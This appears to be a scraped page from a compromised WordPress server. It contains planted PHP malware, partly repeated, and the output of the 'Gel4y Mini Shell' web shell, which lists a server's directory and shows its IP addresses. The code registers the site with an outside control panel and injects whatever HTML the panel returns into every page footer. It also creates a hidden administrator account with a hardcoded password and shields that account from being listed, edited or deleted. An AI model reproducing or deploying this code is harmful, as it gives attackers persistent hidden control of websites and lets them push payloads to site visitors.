function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.221)
  • Path: ~/usr/share/doc/nodejs-doc/api/
    Name Size Permission Action
    assets N/A drwxr-xr-x
    addons.html 53.666KB -rw-r--r--
    addons.md.gz 9.796KB -rw-r--r--
    all.html 3.13MB -rw-r--r--
    assert.html 69.814KB -rw-r--r--
    assert.md.gz 8.167KB -rw-r--r--
    async_hooks.html 45.546KB -rw-r--r--
    async_hooks.md.gz 8.188KB -rw-r--r--
    buffer.html 157.611KB -rw-r--r--
    buffer.md.gz 16.985KB -rw-r--r--
    child_process.html 111.129KB -rw-r--r--
    child_process.md.gz 13.712KB -rw-r--r--
    cli.html 47.438KB -rw-r--r--
    cli.md.gz 7.5KB -rw-r--r--
    cluster.html 46.912KB -rw-r--r--
    cluster.md.gz 7.481KB -rw-r--r--
    console.html 38.658KB -rw-r--r--
    console.md.gz 4.731KB -rw-r--r--
    crypto.html 212.404KB -rw-r--r--
    crypto.md.gz 20.62KB -rw-r--r--
    debugger.html 15.252KB -rw-r--r--
    debugger.md.gz 2.327KB -rw-r--r--
    deprecations.html 101.971KB -rw-r--r--
    deprecations.md.gz 11.03KB -rw-r--r--
    dgram.html 46.048KB -rw-r--r--
    dgram.md.gz 6.506KB -rw-r--r--
    dns.html 86.308KB -rw-r--r--
    dns.md.gz 8.269KB -rw-r--r--
    documentation.html 11.694KB -rw-r--r--
    documentation.md 3.663KB -rw-r--r--
    domain.html 27.426KB -rw-r--r--
    domain.md.gz 5.451KB -rw-r--r--
    errors.html 164.883KB -rw-r--r--
    errors.md.gz 20.078KB -rw-r--r--
    esm.html 17.084KB -rw-r--r--
    esm.md.gz 2.82KB -rw-r--r--
    events.html 43.872KB -rw-r--r--
    events.md.gz 5.462KB -rw-r--r--
    fs.html 330.846KB -rw-r--r--
    fs.md.gz 28.03KB -rw-r--r--
    globals.html 15.239KB -rw-r--r--
    globals.md.gz 1.236KB -rw-r--r--
    http.html 124.802KB -rw-r--r--
    http.md.gz 17.736KB -rw-r--r--
    http2.html 209.438KB -rw-r--r--
    http2.md.gz 25.836KB -rw-r--r--
    https.html 26.245KB -rw-r--r--
    https.md.gz 3.501KB -rw-r--r--
    index.html 8.811KB -rw-r--r--
    index.md 1.57KB -rw-r--r--
    inspector.html 17.345KB -rw-r--r--
    inspector.md.gz 2.23KB -rw-r--r--
    intl.html 20.58KB -rw-r--r--
    intl.md.gz 3.527KB -rw-r--r--
    modules.html 48.546KB -rw-r--r--
    modules.md.gz 9.037KB -rw-r--r--
    n-api.html 247.987KB -rw-r--r--
    n-api.md.gz 32.483KB -rw-r--r--
    net.html 82.9KB -rw-r--r--
    net.md.gz 9.855KB -rw-r--r--
    os.html 53.189KB -rw-r--r--
    os.md.gz 7.368KB -rw-r--r--
    path.html 32.741KB -rw-r--r--
    path.md.gz 3.753KB -rw-r--r--
    perf_hooks.html 31.927KB -rw-r--r--
    perf_hooks.md.gz 3.181KB -rw-r--r--
    process.html 118.78KB -rw-r--r--
    process.md.gz 19.764KB -rw-r--r--
    punycode.html 14.661KB -rw-r--r--
    punycode.md.gz 1.463KB -rw-r--r--
    querystring.html 16.917KB -rw-r--r--
    querystring.md.gz 1.793KB -rw-r--r--
    readline.html 39.122KB -rw-r--r--
    readline.md.gz 5.637KB -rw-r--r--
    repl.html 38.592KB -rw-r--r--
    repl.md.gz 6.946KB -rw-r--r--
    stream.html 150.268KB -rw-r--r--
    stream.md.gz 23.016KB -rw-r--r--
    string_decoder.html 12.156KB -rw-r--r--
    string_decoder.md 2.748KB -rw-r--r--
    synopsis.html 9.934KB -rw-r--r--
    synopsis.md 2.686KB -rw-r--r--
    timers.html 22.618KB -rw-r--r--
    timers.md.gz 2.483KB -rw-r--r--
    tls.html 106.342KB -rw-r--r--
    tls.md.gz 17.927KB -rw-r--r--
    tracing.html 16.441KB -rw-r--r--
    tracing.md.gz 2.025KB -rw-r--r--
    tty.html 20.34KB -rw-r--r--
    tty.md.gz 2.395KB -rw-r--r--
    url.html 76.678KB -rw-r--r--
    url.md.gz 10.63KB -rw-r--r--
    util.html 128.5KB -rw-r--r--
    util.md.gz 13.971KB -rw-r--r--
    v8.html 33.736KB -rw-r--r--
    v8.md.gz 3.859KB -rw-r--r--
    vm.html 72.431KB -rw-r--r--
    vm.md.gz 9.85KB -rw-r--r--
    worker_threads.html 35.045KB -rw-r--r--
    worker_threads.md.gz 5.057KB -rw-r--r--
    zlib.html 74.5KB -rw-r--r--
    zlib.md.gz 7.198KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet